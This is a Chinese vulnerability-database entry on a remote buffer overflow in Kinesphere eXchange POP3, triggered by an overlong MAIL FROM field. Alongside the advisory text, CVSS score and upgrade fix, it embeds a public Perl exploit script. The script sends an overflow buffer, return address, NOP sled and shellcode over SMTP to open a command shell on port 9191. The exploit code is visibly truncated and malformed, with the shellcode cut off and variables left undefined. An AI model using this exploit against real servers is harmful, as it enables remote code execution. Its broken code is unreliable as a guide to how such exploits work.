发布时间 :2004-04-20 00:00:00
修订时间 :2016-10-17 23:03:31

[原文]Buffer overflow in Kinesphere eXchange POP3 allows remote attackers to execute arbitrary code via a long MAIL FROM field.

[CNNVD]Kinesphere Corporation Exchange POP3远程缓冲区溢出漏洞(CNNVD-200404-076)

        eXchange POP3是一款使用POP3或IMAP协议从Internet邮箱下载信息的系统。
        eXchange POP3对部分邮件字段消息缺少正确的缓冲区边界检查,远程攻击者利用这个漏洞对系统进行缓冲区溢出攻击,可能以进程权限执行任意指令。
        提交包含超长字符串的"Mail From:"字段的邮件给eXchange POP3处理,可发生缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20040419 Exchange pop3 remote exploit
(UNKNOWN)  BUGTRAQ  20040527 Re: Exchange pop3 remote exploit
(VENDOR_ADVISORY)  XF  exchange-pop3-smtp-bo(15922)

- 漏洞信息

Kinesphere Corporation Exchange POP3远程缓冲区溢出漏洞
高危 边界条件错误
2004-04-20 00:00:00 2005-10-20 00:00:00
        eXchange POP3是一款使用POP3或IMAP协议从Internet邮箱下载信息的系统。
        eXchange POP3对部分邮件字段消息缺少正确的缓冲区边界检查,远程攻击者利用这个漏洞对系统进行缓冲区溢出攻击,可能以进程权限执行任意指令。
        提交包含超长字符串的"Mail From:"字段的邮件给eXchange POP3处理,可发生缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令。

- 公告与补丁

        Kinesphere Corporation

- 漏洞信息 (24028)

Kinesphere Corporation Exchange POP3 4.0/5.0 Remote Buffer Overflow Vulnerability (EDBID:24028)
windows remote
2004-04-20 Verified
0 securma massine
N/A [点击下载]

It has been reported that Exchange POP3 e-mail gateway is prone to a remote buffer overflow vulnerability that may allow an attacker to execute arbitrary code on a vulnerable system. This issue could allow an attacker to gain unauthorized access in the context of the affected process.

#!/usr/bin/perl -w

#Exchange pop3 Remote Exploit
#eXchange POP3 is a gateway (connector) that downloads messages from Internet mailboxes
#using the POP3 or IMAP protocol. It then determines the proper recipient(s) for each message
#and sends them to Exchange Server using the SMTP protocol.
#eXchange POP3 can also receive Internet-bound messages from Exchange Server and relay them to
#the Internet. ( )
#by sending a buffer 1025 byte we have:
#telnet target 25
#220 xwcf ESMTP
#mail from:<< "A"x1019  server is down
#eax=00000000  ebx=00000000 ecx=61616161 edx=77f733b4
#esi=00000000  edi=00000000   esp=01ebf0d0 ebp=01ebf0f0
# the other problem lies in the fact that esp does not point at the beginning of our buffer,
# I chose another  approach, and to seek in another zone memory.
# the ret address can be modified as well as the size of the buffer by using windbg.
# the exploit was tested on xp sp1 win2000 by using different shellcodes, the size of shellcode
# does not have any effect, for the nop 528999 is the minimal size which I could find to fall on ret
# address, you can also modify this value...
# this exploit is used for test only and I am not to in no case responsible for what you can do.
#greez: simo,abder,marocit,

use Net::SMTP;
$buffer = "A"x1015;
$ret ="\x80\x1d\xdc\x02";# Another memory zone
$nop ="\x90"x1999999;
$shellcode =          "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33".
if (not $ARGV[0]) {
        print qq~
        Usage: <host>
print "+++++++++++++++++++++++\n\n";
        print "Exchange pop3 exploit \n\n";
        print "Discovered by securma massine \n\n";
        print "securma\ \n\n";
        print "+++++++++++++++++++++++\n\n";

$smtp = Net::SMTP->new($remote);
$smtp->mail($buffer . $ret . $nop . $shellcode);
print "\nNow telnet to your cmd shell port 9191 \n";

- 漏洞信息

Kinesphere eXchange POP3 Buffer Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Kineshpere's eXchange POP3. The application fails to properly handle a very large (1025 byte) MAIL FROM header resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code to be run resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2004-04-22 Unknow
2004-04-22 Unknow

- 解决方案

Upgrade to version 5.0.1629 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者